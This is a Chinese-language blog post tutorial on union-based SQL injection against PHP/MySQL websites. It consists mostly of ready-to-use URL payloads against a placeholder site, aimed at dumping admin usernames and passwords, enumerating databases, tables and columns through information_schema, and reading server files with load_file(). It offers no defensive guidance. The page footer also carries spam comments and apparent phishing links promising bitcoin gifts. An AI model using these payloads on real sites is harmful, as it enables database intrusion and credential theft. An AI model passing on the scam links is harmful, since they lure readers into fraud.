小灰博客--小灰IT技术博客 | sky00.com

MYSQL注入

大家都知道,危害我们网站安全较多的漏洞还是注射漏洞。无论腾讯、百度、SINA等等大型网站都惊现过注入漏洞,今天讲解的是PHP+MYSQL的注入。我们注重的不是WEB语言而是数据库.了解一条SQL语句是如何运行。
常规WEB语言与数据库搭配方法:php+mysql、ASP+ACC、JSP+ORACLE、ASPX+MSSQL等等搭配都有
以下判断是否存在注入漏洞的语句.其中/*在MYSQL中是个注释语句.
http://www.xxx.com/sql.php?id=7 and 1=1/*
http://www.xxx.com/sql.php?id=7 and 1=2/*
下面我们用ORDER BY 语句进行字段中查询的记录进行排序;
http://www.xxx.com/sql.php?id=7 order by 10/* 一直重1到10输入ORDER BY 11 返回出错
下面用猜表名方法;(假设表明为admin)
http://www.xxx.com/sql.php?id=7 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin/*
当这样返回正常的话.存在此表明了!当然会显示一些特殊数字的WEB上
下面用猜字段方法;(假设字段为user 和pass)
http://www.xxx.com/sql.php?id=7 and 1=2 union select 1,2,user,pass,5,6,7,8,9,10 from admin/*
我们可爱的账户与密码出来了(一般密码是经过MD5处理或者其他加密)
但是我们在MYSQL中(假设版本是5)的注射手法,mysql5中增加一个库叫information_schema,可以爆库爆表爆字段。解决了我们找不了表明与字段的烦恼
union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 1,1/*
limit 从0开始递增,查询到4时浏览器返回错误,说明存在3个库。
union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
limit 从0开始递增,查询到7时浏览器返回错误,说明此库存在6个表。
union select 1,2,3,COLUMN_NAME,4,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列


这样可以解决我们找不到表与字段的烦躁(版本为MYSQL5)
介绍下MYSQL中的函数(CONCAT_WS()函数)
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10/*
这里的意思一次查看MYSQL的版本信息当前用户等等
介绍下MYSQL中的函数(load_file() 函数)
and 1=2 union select 1,2,3,load_file(16进制转换),5,6,7,8,9,10/*
使用load_file()读取敏感信息必须该用户赋予最高的权限..把你需要的文件路径转换为16进制即可
部分还有几个MYSQL中的函数没介绍,但这文章需要时间..


如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

分享该文章到:

8条评论

  1. 止水带说道:

    好文章,内容十全十美.禁止此消息:nolinkok@163.com

  2. 硝化纤维说道:

    不错的文章,内容文章雅致.禁止此消息:nolinkok@163.com

  3. 氯化橡胶漆说道:

    不错的文章,内容妙不可言.禁止此消息:nolinkok@163.com

  4. 防火板说道:

    好文章,内容惊天动地.禁止此消息:nolinkok@163.com

  5. 踏步板说道:

    不错的文章,内容远见卓识.禁止此消息:nolinkok@163.com

  6. 烧纸批发说道:

    不错的文章,内容学富五车.禁止此消息:nolinkok@163.com

  7. 防虫网说道:

    不错的文章,内容一气呵成.禁止此消息:nolinkok@163.com

  8. 荷兰网说道:

    不错的文章,内容完美无缺.禁止此消息:nolinkok@163.com



发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

分类

最新评论

  • You have a gift from our company. GЕТ >> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=9e710a17c6f1893b8975843ad65a53ec&:mmcrid
  • Message; + 1.821 BTC. Receive => https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=288b547ad0b0b6df04e6cda847129548&:zy0yat
  • You have a gift from user. GЕТ > https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=164145d501515772aa4824d0b8561afe&:jubf9l
  • Message: Process #XI77. ASSURE =>> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=d5ea508b8dcc5925b48f4f5f95b69369&:hst2ca
  • Notification- Process #WG96. NEXT >>> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=f4f7ece997f382758bf7917d8d281a38&:30jg5l
  • You have received 1 message № 566. Read >> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=8b618b6f3e2558ea545b01f25c66ea45&:ctoq4z
  • Ticket- Operation 1.82687 BTC. Next > https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=78faf331ce944e7f6d74e3f488bda258&:ls34jm
  • QAQ:要實名制啦...不能用QAQ
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=9e710a17c6f1893b8975843ad65a53ec:tavjfc
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=d10fa0f01c28120a8a67cc553684d85a:yhlzth
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=82b659c095cace05cbef312726b6e1d9:no5bkb
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=f4f7ece997f382758bf7917d8d281a38:thx8xj
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=e8e513973712a3c92cfc5061bded6465:8kow6n
  • Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=661bdfd9e71cbca7a188c8b6bfd0106a:p6gq3q
  • Leo:212121
  • 黑客:dddddd :lol: :mad: :roll:
  • Leo:111
  • 匿名者:哈哈啊哈
  • 今日新闻头条:似此星辰非昨夜,为谁风露立中宵。 https://china
  • 小黑:我就被骗了